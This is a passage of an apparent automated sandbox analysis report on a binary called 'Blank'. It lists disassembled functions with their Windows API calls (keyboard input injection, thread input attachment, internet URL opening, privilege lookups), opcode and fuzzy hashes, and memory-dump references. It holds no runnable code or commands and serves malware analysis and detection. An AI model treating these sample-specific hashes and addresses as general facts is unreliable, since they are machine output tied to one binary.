                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                    • Opcode ID: 2441cd563ae468f6c4cc61de2b0ac89a0759c30bf68ff74a5295768e95fbfe4d
                                                                                                                                    • Instruction ID: 8e3d82dd4851a1474cf4a9009de03716c1f67647e1a007300540f09020cb9f52
                                                                                                                                    • Opcode Fuzzy Hash: 2441cd563ae468f6c4cc61de2b0ac89a0759c30bf68ff74a5295768e95fbfe4d
                                                                                                                                    • Instruction Fuzzy Hash: 7D314A30960289AAFF348A258C0BFF9BBA5AB46324F04439EE490535D6C37489719B95
                                                                                                                                    Function 002C1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,000BECBC,?,00008000), ref: 002C1465
                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 002C1481
                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 002C14E0
                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,000BECBC,?,00008000), ref: 002C1532
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                    • Opcode ID: 1ee4527bdf4d1c26ab7737f97415921c76fde1442dd378396dd0169c23557ee4
                                                                                                                                    • Instruction ID: 6fdedbab3ef0d8599ee0086cf340ecead6fcc24441a642507841252c92e9abea
                                                                                                                                    • Opcode Fuzzy Hash: 1ee4527bdf4d1c26ab7737f97415921c76fde1442dd378396dd0169c23557ee4
                                                                                                                                    • Instruction Fuzzy Hash: FF314B3096064A9EFF388F659C06FFABB65AF86320F48431EE485521D3C37489759B61
                                                                                                                                    Function 002963F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0029642B
                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00296459
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00296487
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002964BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                    • Opcode ID: 7362259ee8ffdc75c1124bc4c3e7013bbe8af08e936e2605bd9442020b75a050
                                                                                                                                    • Instruction ID: fbe1e801bda5ab95d4de1179a27ae101232df96588c3f0547b9524490c5d665e
                                                                                                                                    • Opcode Fuzzy Hash: 7362259ee8ffdc75c1124bc4c3e7013bbe8af08e936e2605bd9442020b75a050
                                                                                                                                    • Instruction Fuzzy Hash: 5A31AF31620256AFDF318FA5CC88BAA7BE9FF40720F155029E86497191DB31E870DB90
                                                                                                                                    Function 002E552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32 ref: 002E553F
                                                                                                                                      • Part of subcall function 002C3B34: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C3B4E
                                                                                                                                      • Part of subcall function 002C3B34: GetCurrentThreadId.KERNEL32 ref: 002C3B55
                                                                                                                                      • Part of subcall function 002C3B34: AttachThreadInput.USER32(00000000,?,002C55C0), ref: 002C3B5C
                                                                                                                                    • GetCaretPos.USER32(?), ref: 002E5550
                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 002E558B
                                                                                                                                    • GetForegroundWindow.USER32 ref: 002E5591
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                    • Opcode ID: 5380d8f737e8ddf61ada0521940ff0e26994395eede723cea6619437469815eb
                                                                                                                                    • Instruction ID: 13d139079be9276e9347cf1cfa458802006d20f2c50f0045b2deb28ba939db06
                                                                                                                                    • Opcode Fuzzy Hash: 5380d8f737e8ddf61ada0521940ff0e26994395eede723cea6619437469815eb
                                                                                                                                    • Instruction Fuzzy Hash: 72312A71D10108AFDB00EFA5D885DEEB7FDEF99304F10446AE455E7241EA71AE548FA0
                                                                                                                                    Function 002ECB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • GetCursorPos.USER32(?), ref: 002ECB7A
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0029BCEC,?,?,?,?,?), ref: 002ECB8F
                                                                                                                                    • GetCursorPos.USER32(?), ref: 002ECBDC
                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0029BCEC,?,?,?), ref: 002ECC16
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                    • Opcode ID: b60dc5564aaa03f10a1403938f476a0bad820229b495d9f5ee11b7c4e7c8b412
                                                                                                                                    • Instruction ID: 5c14d6fadd3aa99ae09ba22f8a4dcb58517f883b4e88157f096461022e45f565
                                                                                                                                    • Opcode Fuzzy Hash: b60dc5564aaa03f10a1403938f476a0bad820229b495d9f5ee11b7c4e7c8b412
                                                                                                                                    • Instruction Fuzzy Hash: EC31C335510098AFCB258F96CC89EBE7BB9FB49310F944069F90597361C3315D62DFA0
                                                                                                                                    Function 00280BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __setmode.LIBCMT ref: 00280BE2
                                                                                                                                      • Part of subcall function 0027402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002C7E51,?,?,00000000), ref: 00274041
                                                                                                                                      • Part of subcall function 0027402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002C7E51,?,?,00000000,?,?), ref: 00274065
                                                                                                                                    • _fprintf.LIBCMT ref: 00280C19
                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 002B694C
                                                                                                                                      • Part of subcall function 00284CCA: _flsall.LIBCMT ref: 00284CE3
                                                                                                                                    • __setmode.LIBCMT ref: 00280C4E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 521402451-0
                                                                                                                                    • Opcode ID: 386af5d9fcb612415ed56f000c4b46410a02c3d8194b680b7881388a08c35673
                                                                                                                                    • Instruction ID: 71e72dd2ae9ff11b1e420742a6462e6677ec229cdf7e0e8f80f33a0949660b26
                                                                                                                                    • Opcode Fuzzy Hash: 386af5d9fcb612415ed56f000c4b46410a02c3d8194b680b7881388a08c35673
                                                                                                                                    • Instruction Fuzzy Hash: A5115439926205BBD718BBA4AC86ABEBB2CAF41320F14411AF204571C2DF3119768BA1
                                                                                                                                    Function 002B9274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002B8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002B8D3F
                                                                                                                                      • Part of subcall function 002B8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002B8D49
                                                                                                                                      • Part of subcall function 002B8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002B8D58
                                                                                                                                      • Part of subcall function 002B8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002B8D5F
                                                                                                                                      • Part of subcall function 002B8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002B8D75
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002B92C1
                                                                                                                                    • _memcmp.LIBCMT ref: 002B92E4
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002B931A
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 002B9321
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1592001646-0
                                                                                                                                    • Opcode ID: 8283b0996924ae1754449a49a8d19c3d2ba0e931a98fc606d2bdbabc0a7c2437
                                                                                                                                    • Instruction ID: 7506aa5c0a0756b17a7daa34e55efd968f2acbca2a442ec8f0fe34692458a208
                                                                                                                                    • Opcode Fuzzy Hash: 8283b0996924ae1754449a49a8d19c3d2ba0e931a98fc606d2bdbabc0a7c2437
                                                                                                                                    • Instruction Fuzzy Hash: 1B218C31E50119AFDB10DFA4C949BEEB7F8EF44391F044099E984A7291D770AA95CFA0
                                                                                                                                    Function 002D1E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002D1E6F
                                                                                                                                      • Part of subcall function 002D1EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002D1F18
                                                                                                                                      • Part of subcall function 002D1EF9: InternetCloseHandle.WININET(00000000), ref: 002D1FB5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1463438336-0
                                                                                                                                    • Opcode ID: ce30e06534b10abc566c9d873387b8d9bfd584ff95ab0988f89f0ace30057f69
                                                                                                                                    • Instruction ID: 0e02ad53adb6fa9cd64c145a73392fefe2f517bfc5eff7f2d8782f082ad61994
                                                                                                                                    • Opcode Fuzzy Hash: ce30e06534b10abc566c9d873387b8d9bfd584ff95ab0988f89f0ace30057f69
                                                                                                                                    • Instruction Fuzzy Hash: 5A218E31210606BFDB119F609C41FBBB7AABB84710F10411BFE4596A91DBB1AC319B90
                                                                                                                                    Function 002C3F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNEL32(?,002F2C4C), ref: 002C3F57
                                                                                                                                    • GetLastError.KERNEL32 ref: 002C3F66
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002C3F75
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002F2C4C), ref: 002C3FD2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                    • Opcode ID: 47fa84f709f115a9b9253524cc04a1ba4f696392f52370e6728ca543af979951
                                                                                                                                    • Instruction ID: d3a1bd30380b204c025f58ae32a99205a49efed1f9aedcdfec6241bf6083069e
                                                                                                                                    • Opcode Fuzzy Hash: 47fa84f709f115a9b9253524cc04a1ba4f696392f52370e6728ca543af979951
                                                                                                                                    • Instruction Fuzzy Hash: 5521B1709282019F8710DF28D885D6AB7F4BE5A364F108F1EF498C72A2D731DA66CB52
                                                                                                                                    Function 002E634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002E63BD
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002E63D7
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002E63E5
                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002E63F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                    • Opcode ID: 0dc3b36f668f646c1d2fc2c86a9d473a6e95238ea88048425949cd16db5829cf
                                                                                                                                    • Instruction ID: 68f61b658c105ee4bc751968245962c04a30badc993aeab8772851b82ea307e6
                                                                                                                                    • Opcode Fuzzy Hash: 0dc3b36f668f646c1d2fc2c86a9d473a6e95238ea88048425949cd16db5829cf
                                                                                                                                    • Instruction Fuzzy Hash: 94112631360414AFE700AB25DC88FBA7799EF85760F144158F916C72D2CBA0AD50CF90
                                                                                                                                    Function 002BE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002BF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002BE46F,?,?,?,002BF262,00000000,000000EF,00000119,?,?), ref: 002BF867
                                                                                                                                      • Part of subcall function 002BF858: lstrcpyW.KERNEL32(00000000,?,?,002BE46F,?,?,?,002BF262,00000000,000000EF,00000119,?,?,00000000), ref: 002BF88D
                                                                                                                                      • Part of subcall function 002BF858: lstrcmpiW.KERNEL32(00000000,?,002BE46F,?,?,?,002BF262,00000000,000000EF,00000119,?,?), ref: 002BF8BE
                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002BF262,00000000,000000EF,00000119,?,?,00000000), ref: 002BE488
                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,002BF262,00000000,000000EF,00000119,?,?,00000000), ref: 002BE4AE
                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,002BF262,00000000,000000EF,00000119,?,?,00000000), ref: 002BE4E2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                    • String ID: cdecl
                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                    • Opcode ID: e2880995c18b56b96883f07262175e9aaef62d671d35b1ef4f3a21fda865c72a
                                                                                                                                    • Instruction ID: 9c3abaa8837545f81753c0c3df409d715f56f1a4870851a50def4d085e38c7fc
                                                                                                                                    • Opcode Fuzzy Hash: e2880995c18b56b96883f07262175e9aaef62d671d35b1ef4f3a21fda865c72a
                                                                                                                                    • Instruction Fuzzy Hash: BE11963A110345AFDF25AF24DC45DFA77B9FF45390B41402AF809CB2A1EB719960CBA1
                                                                                                                                    Function 00295312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 00295331
                                                                                                                                      • Part of subcall function 0028593C: __FF_MSGBANNER.LIBCMT ref: 00285953
                                                                                                                                      • Part of subcall function 0028593C: __NMSG_WRITE.LIBCMT ref: 0028595A
                                                                                                                                      • Part of subcall function 0028593C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000004,?,?,00281003,?), ref: 0028597F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocHeap_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1080816511-0
                                                                                                                                    • Opcode ID: 0f78aac9befee77746271b33e7662dfcbffaf1e085574ebeae5d432a7bc67573
                                                                                                                                    • Instruction ID: 52395c6c05ccb2b72e15b688161b8992a7831ab87b4ae0f89f25d22dc3d9ff28
                                                                                                                                    • Opcode Fuzzy Hash: 0f78aac9befee77746271b33e7662dfcbffaf1e085574ebeae5d432a7bc67573
                                                                                                                                    • Instruction Fuzzy Hash: 8911E732636A26AFCF323F70AC4566A37989F143E0F504969F9189A1D1DEB489608B94
                                                                                                                                    Function 00275B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00275B58
                                                                                                                                      • Part of subcall function 002756F8: _memset.LIBCMT ref: 00275787
                                                                                                                                      • Part of subcall function 002756F8: _wcscpy.LIBCMT ref: 002757DB
                                                                                                                                      • Part of subcall function 002756F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002757EB
                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00275BAD
                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00275BBC
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002B0D7C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
